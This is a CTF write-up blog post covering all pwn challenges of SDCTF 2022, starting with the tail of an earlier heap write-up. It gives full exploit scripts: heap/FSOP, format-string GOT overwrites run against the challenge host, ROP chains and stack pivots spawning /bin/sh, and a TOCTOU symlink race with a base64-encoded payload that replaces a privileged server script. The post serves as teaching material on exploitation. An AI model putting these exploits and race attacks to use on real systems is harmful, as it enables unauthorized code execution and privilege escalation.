3. tcache unlinking to modify stderr->chain to the heap area
4. FSOP: use _IO_str_finish when exit to getshell
"""

build_small(0, 0x30)
build_small(1, 0x30)
fix_small(0, 0x100)
build_big()

examine_small(0)
# leak libc address
libc_base = recv_current_libc_addr() - 0x3ebcd0
set_current_libc_base_and_log(libc_base)

build_small(2, 0x30)

build_small(6, 0x28)
build_small(7, 0x28)
build_small(9, 0x38, "\x00")
build_small(10, 0x28)
build_small(11, 0x38, p64_ex(0)+p64_ex(libc_base + 0x3e8360 - 8)+p64(0)+p64(libc.sym.system)) # _IO_str_jumps
build_small(12, 0x38)
build_small(13, 0x38)

fix_small(6, 0x100)
fix_small(7, 0x100)
fix_small(6, 0x28, p64(libc_base + 0x3ec6e8 - 0x10)) # stderr->chain


fix_small(0, 0x100)
fix_small(1, 0x100)
fix_small(0, 0x30, p64_ex(libc_base + 0x3eb2d0-0x8))

build_small(3, 0x30)
build_small(4, 0x30)
build_small(5, 0x30, flat([0x408, 0x9]))
build_small(8, 0x28, b"deadbeef" + p64(libc.search(b"/bin/sh").__next__()))

giveup()
sleep(1)
sl("cat flag.txt")

ia()

Reference

1、My Blog

2、Ctf Wiki

3、pwncli

2022-Sdctf-All-Pwn-Wp

Sun, 08 May 2022 15:15:44 +0800

I was shocked when I found I stayed in a only-me team. Where are my teammates?

Anyway, I have completed all the tasks of pwn in a afternoon. These tasks are not very hard, and it takes me about 4 hours. In fact, I have spent almost 2 hours on solving shamav, this task is a little bit challengeable and interesting.

Oil Spill

Checksec

No relro and no pie, the remote glibc version is libc6_2.27-3ubuntu1.5_amd64.

Vulnerability

Glibc address is given, then, we can use printf attack:

Solution

It’s an easy task about fmt-attack. However, I had a problem when I used my exp.py to attack remote host. The problem is that I cannot get any output from the remote host. After I input something, I get the address of puts/printf/temp and then, the program in remote host is stopped. That means I cannot get glibc address before I input…….Maybe it’s caused by my proxy VPN app.

In order to solve the problem, I decide to find a way to execute the main function again. The .fini_array section is chosen and I plan to replace .fini_array[0] with main address. Unfortunately, the address of .fini_array is 0x600A40, which contains \x0a. WTF!!!!

Then, I try to use partial overwritting to do rop， and I found that there’s a gadget add rsp, 0x38; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; nearby puts@glibc.

1
2

0x0000000000080344: add rsp, 0x38; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
000000000000080970   512 FUNC    GLOBAL DEFAULT   13 _IO_puts@@GLIBC_2.2.5

To guess half a byte of the gadget, and use fmt-attack to modify the lowest 2 bytes of puts@got. then make use of magic gadget to change printf@got to one gadget and call printf to get shell.

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

set_remote_libc("./libc-2.27.so")

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

# offset 8
magic = 0x400658
pop_rbx = 0x4007DA

write_num = 10099 # 0x0000000000080773: add rsp, 0x48; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
printf_off = 0x64f70
og_off = 0x4f432

if gift.remote:
    write_num = 9028
    printf_off = 0x64e40
    og_off = 0x4f302

data = flat_z({
    0:{
        0: f"%{write_num}c%40$hn",
        80: [
            0x400772,
            0x400772, # ret
            pop_rbx,
            0x100000000 + og_off - printf_off, # printf,
            0x600c20 + 0x3d,
            0, 0, 0, 0,
            magic,
            0x400588, #printf
        ]
        },
    }, length=0x100) + p64_ex(0x600c18) # puts

sleep(1)
sl(data)

m = rls("0x").split(b",")
libc_base = int16_ex(m[0]) - libc.sym.puts
log_address("libc_base", libc_base)

if (libc_base & 0xffff) == 0x2000:
    log_ex_highlight("get shell!")
    sl("cat flag.txt")
    ia()
else:
    ic()

use command : for i in $(seq 1 8); do ./exp.py re ./OilSpill oil.sdc.tf:1337 -nl; done to enumerate and get shell.

Horoscope

A basic rop task

Vulnerability

and there are two functions to help you get shell:

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']

sl(flat({
    0: "1/1/1/1/",
    8: {
        48: [
            elf.sym.debug,
            elf.sym.test
        ]
    }
}))

r()
sl("cat flag.txt")

ia()

attack remote host:

BreakfastMenu

Heap related, maybe.

Checksec

The remote glibc version is also libc6_2.27-3ubuntu1.5_amd64.

Vulnerability

The idx could be a negative number, I call it as int overflow:

Solution

The steps:

create a new order
use int overflow to replace got@free with puts@plt and replace exit@got with malloc@got
use int overflow to delete an order related malloc@got, actually, it leaks the real address of malloc function
use int overflow to modify free@got to system, which is gained by the address of malloc
delete an order with /bin/sh to get shell

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

set_remote_libc("./libc-2.27.so")

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

def create():
    sla("4. Pay your bill and leave\n", "1")
    ru("A new order has been created\n")


def edit(i, data):
    sla("4. Pay your bill and leave\n", "2")
    sla("which order would you like to modify\n", str(i))
    sla("What would you like to order?\n", data)

def dele(i):
    sla("4. Pay your bill and leave\n", "3")
    sla("which order would you like to remove\n", str(i))


create()
edit(0, "/bin/sh")

edit(-7, p64(elf.plt.puts) + p64(elf.got.free))
edit(-7, p64(elf.got.malloc) + p64(elf.got.exit))

dele(-15)
libc_base = recv_current_libc_addr(offset=libc.sym.malloc)
set_current_libc_base_and_log(libc_base)

edit(-7, p64(libc.sym.system) + p64(elf.got.free))

dele(0)

ia()

Secure Horoscope

Still a basic rop challenge…

Vulnerability

A buffer overflow with 0x1c bytes:

Solution

I found a fast solution after reading the asm code of this program:

When rbp is hijacked, we can write data anywhere.

The steps:

buffer overflow and to control rbp
write rop chain in the bss section and do stack pivot
rop and use magic gadget to get shell

EXP

#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick

from pwncli import *

cli_script()

io: tube = gift['io']
elf: ELF = gift['elf']
libc: ELF = gift['libc']

sla("To get started, tell us how you feel\n", "great")
sa("we will have your very own horoscope\n\n", flat({
    0x70: [
        elf.bss(0x470),
        0x4007cf
    ]
}, length=0x8c))
sleep(1)
CurrentGadgets.set_find_area(find_in_libc=False)
s(flat_z({
    0: [
        elf.bss(0x470),
        CurrentGadgets.write_by_magic(elf.got.puts, libc.sym.puts, get_current_one_gadget_from_libc()[1]),
        elf.plt.puts
    ],
    0x70: [
        elf.bss(0x400),
        0x40080D
    ]
}, length=0x8c))

ia()

ShamAV

It’s about toutoc vuln, that is time of use time of change/check. Soft symbol link attack is used in this challenge.

Tips: shutil.copyfile(src, dst) will raise an exception if src is not readable; If dst already exists, it will be replaced.

Analysis of Server

Download the server.py:

#! /usr/bin/env python3                                                                                                                                                                                 [40/1990]import base64, socket, os, hashlib, shutil, sys
import base64, socket, os, hashlib, shutil, sys

USER_UID = 1002
CTR_LENGTH = 256
STDIO_DEBUG = False

ctr = 0
malware_hashes = set()

with open('malware-hashes.txt') as f:
    for line in f:
        malware_hashes.add(line.strip())

with open('seed') as f:
    seed = base64.b64decode(f.read())
    # Read from a seed file to make the behavior more reproduce-able
    # Make testing a lot easier

def log(s: str):
    print(s, file=sys.stderr, flush=True)

def genrandom():
    global ctr
    result = hashlib.sha256(ctr.to_bytes(CTR_LENGTH, byteorder='little') + seed).hexdigest()
    ctr += 1
    return result

def is_malware(file: str):
    with open(file, 'rb') as f:
        return hashlib.sha256(f.read()).hexdigest() in malware_hashes

def _scan(path: str):
    log(f'[I] Scanning file {path}')
    try:
        if os.lstat(path).st_uid != USER_UID:
            return "You do not have permission to scan this item"
    except OSError as e:
        return f'Error from OS: {e}'
    target_path = f'/home/antivirus/quarantine/sham-av-{genrandom()}'
    log(f'[D] Copying file from {path} to {target_path}')
    try:
        shutil.copyfile(path, target_path)
        if is_malware(target_path):
            log(f'[I] Found malware at {path}')
            return f'***** Malware detected! File quarantined at {target_path} *****'
    except IsADirectoryError as e:
        return f'An error occurred: {e}'
    return "File scan completed. No malware detected."

def scan(path: str):
    res = _scan(path)
    log(f'[I] Scan complete: {path}')
    return res

SOCKET_FILE = 'socket'
BS = 4096

def recvall(sock):
    chunks = []
    while True:
        chunk = sock.recv(BS)
        if chunk == b'':
            return b''.join(chunks)
        chunks.append(chunk)

while True:
    if STDIO_DEBUG:
        try:
            path = input()
        except EOFError:
            break
        print(f'Scan result: {scan(path)}')
    else:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            try:
                os.unlink(SOCKET_FILE)
            except FileNotFoundError:
                pass
            s.bind(SOCKET_FILE)
            os.chmod(SOCKET_FILE, 0o777)
            s.listen()
            while True:
                log(f'[I] Ready for the next client')
                conn, _ = s.accept()
                res = scan(recvall(conn).decode(errors='surrogateescape'))
                log(f'[I] Scan result: {res}')
                try:
                    conn.sendall(res.encode())
                except OSError as e:
                    log(f'[E] OS error on sendall: {e}')

and the launch.sh:

#! /usr/bin/env bash

set -e

cd "$(dirname -- "${BASH_SOURCE[0]}")"

function main {
    echo "----- Welcome to ShamAV, version alpha 0.0.1 -----"
    echo "***** Begin System information *****"
    echo "Working directory: $(pwd)"
    echo "Directory listing:"
    ls -la
    echo "***** End System information *****"

    while true; do
        ( umask 077; head -c 32 /dev/urandom | base64 > seed )
        if ./server.py 2>&1; then
            echo "[I] Launcher shutting down..."
            break
        fi
        echo "[!] ShamAV server has crashed, restarting in 1 second..."
        sleep 1
        echo "[I] Restarting ShamAV server"
    done
}

main > av.log

The vuln is in _scan method:

def _scan(path: str):
    log(f'[I] Scanning file {path}')
    try:
        if os.lstat(path).st_uid != USER_UID: # check
            return "You do not have permission to scan this item"
    except OSError as e:
        return f'Error from OS: {e}'
    target_path = f'/home/antivirus/quarantine/sham-av-{genrandom()}'
    log(f'[D] Copying file from {path} to {target_path}')
    try:
        shutil.copyfile(path, target_path) # used

We can create a file which belongs to ctf to bypass the check of USER_UID, then remove the file and create a symbol link to /home/antivirus/seed with the same name instantly. In a lucky moment, the /home/antivirus/seedfile is copied to /home/antivirus/quarantine, so we can read the content of seed and get its data.

Once we get seed, we can generate and forecast all the next sha-256 digest values using genrandom method in server.py.

Solution

The steps:

use symbol link attack to leak seed data and calculate the next sha-256 hash values
create many soft symbol links in /home/antivirus/quarantine with the format /home/antivirus/quarantine/sham-av-{known-digest-value}, all of these links point to /home/antivirus/server.py

create a file /home/ctf/server.py, with content:

1
2
3

#!/usr/bin/env python3
import os
os.system('chmod 777 /home/antivirus/flag.txt')

execute /home/ctf/bin/scan /home/ctf/server.py to replace the /home/antivirus/server.py with /home/ctf/server.py
remove all file in /home/antivirus/quarantine
try to toctou attack /home/antivirus/flag.txt and in a moment, an exception is raised when shutil.copyfile is called, because the parameter src which point to /home/antivirus/flag.txt is not readable
launch.sh would execute ./server.py again, but the file has been replaced, so os.system(chmod 777 flag.txt) is executed

EXP

First, use following command to create three bash scripts:

echo -e '#!/bin/sh\nwhile true; do rm -rf /home/ctf/flag;touch /home/ctf/flag;rm -rf /home/ctf/flag;ln -s /home/antivirus/seed /home/ctf/flag;sleep 0.1; done' > exp1.sh && echo -e '#!/bin/sh\nwhile true; do rm -rf /home/ctf/flag;touch /home/ctf/flag;rm -rf /home/ctf/flag;ln -s /home/antivirus/flag.txt /home/ctf/flag; done' > exp2.sh && echo -e '#!/bin/sh\nwhile true; do /home/ctf/bin/scan /home/ctf/flag; done' > attack.sh && chmod +x *.sh

Then, execute:

1
2

timeout 60 ./exp1.sh &
timeout 60 ./attack.sh

Now, the seed file has been copied to /home/antivirus/quarantine, create a symbol link /home/ctf/seed to point to the seed file in /home/antivirus/quarantine

Use base64 to write go.py：

import base64, hashlib, os
ctr = 0
CTR_LENGTH = 256

with open('seed') as f:
    seed = base64.b64decode(f.read())

def genrandom():
    global ctr
    result = hashlib.sha256(ctr.to_bytes(CTR_LENGTH, byteorder='little') + seed).hexdigest()
    ctr += 1
    return result

data = """#! /usr/bin/env python3
import os
os.system("chmod 777 /home/antivirus/flag.txt")
"""

with open("/home/ctf/server.py", "wt", encoding='utf-8') as f:
    f.write(data.replace("\r\n", "\n"))
    f.flush()

os.system("chmod +x /home/ctf/server.py")

for i in range(0x200):
    filepath = f'/home/antivirus/quarantine/sham-av-{genrandom()}'
    if not os.path.exists(filepath):
        os.system(f"ln -s /home/antivirus/server.py {filepath}")

# replace server.py
os.system("/home/ctf/bin/scan /home/ctf/server.py")

# remove all files
os.system("rm -rf /home/antivirus/quarantine/*")

# check
os.system("ls -al /home/antivirus/quarantine")
os.system("ls -al /home/antivirus/server.py")

And, execute command:

cat > tmp << EOF
aW1wb3J0IGJhc2U2NCwgaGFzaGxpYiwgb3MKY3RyID0gMApDVFJfTEVOR1RIID0gMjU2Cgp3aXRo
IG9wZW4oJ3NlZWQnKSBhcyBmOgogICAgc2VlZCA9IGJhc2U2NC5iNjRkZWNvZGUoZi5yZWFkKCkp
CgpkZWYgZ2VucmFuZG9tKCk6CiAgICBnbG9iYWwgY3RyCiAgICByZXN1bHQgPSBoYXNobGliLnNo
YTI1NihjdHIudG9fYnl0ZXMoQ1RSX0xFTkdUSCwgYnl0ZW9yZGVyPSdsaXR0bGUnKSArIHNlZWQp
LmhleGRpZ2VzdCgpCiAgICBjdHIgKz0gMQogICAgcmV0dXJuIHJlc3VsdAoKZGF0YSA9ICIiIiMh
IC91c3IvYmluL2VudiBweXRob24zCmltcG9ydCBvcwpvcy5zeXN0ZW0oImNobW9kIDc3NyAvaG9t
ZS9hbnRpdmlydXMvZmxhZy50eHQiKQoiIiIKCndpdGggb3BlbigiL2hvbWUvY3RmL3NlcnZlci5w
eSIsICJ3dCIsIGVuY29kaW5nPSd1dGYtOCcpIGFzIGY6CiAgICBmLndyaXRlKGRhdGEucmVwbGFj
ZSgiXHJcbiIsICJcbiIpKQogICAgZi5mbHVzaCgpCgpvcy5zeXN0ZW0oImNobW9kICt4IC9ob21l
L2N0Zi9zZXJ2ZXIucHkiKQoKZm9yIGkgaW4gcmFuZ2UoMHgyMDApOgogICAgZmlsZXBhdGggPSBm
Jy9ob21lL2FudGl2aXJ1cy9xdWFyYW50aW5lL3NoYW0tYXYte2dlbnJhbmRvbSgpfScKICAgIGlm
IG5vdCBvcy5wYXRoLmV4aXN0cyhmaWxlcGF0aCk6CiAgICAgICAgb3Muc3lzdGVtKGYibG4gLXMg
L2hvbWUvYW50aXZpcnVzL3NlcnZlci5weSB7ZmlsZXBhdGh9IikKCiMgcmVwbGFjZSBzZXJ2ZXIu
cHkKb3Muc3lzdGVtKCIvaG9tZS9jdGYvYmluL3NjYW4gL2hvbWUvY3RmL3NlcnZlci5weSIpCgpv
cy5zeXN0ZW0oInJtIC1yZiAvaG9tZS9hbnRpdmlydXMvcXVhcmFudGluZS8qIikKCiMgY2hlY2sK
b3Muc3lzdGVtKCJscyAtYWwgL2hvbWUvYW50aXZpcnVzL3F1YXJhbnRpbmUiKQpvcy5zeXN0ZW0o
ImxzIC1hbCAvaG9tZS9hbnRpdmlydXMvc2VydmVyLnB5Iik=
EOF

base64 -d tmp > go.py
python3 go.py

Finally:

1
2

./exp2.sh &
timeout 60 ./attack.sh

If you’re a lucky boy, you will find the /home/antivirus/flag.txt is rwxrwxrwx, now, capture the flag:

Reference

1、My Blog

2、Ctf Wiki

3、pwncli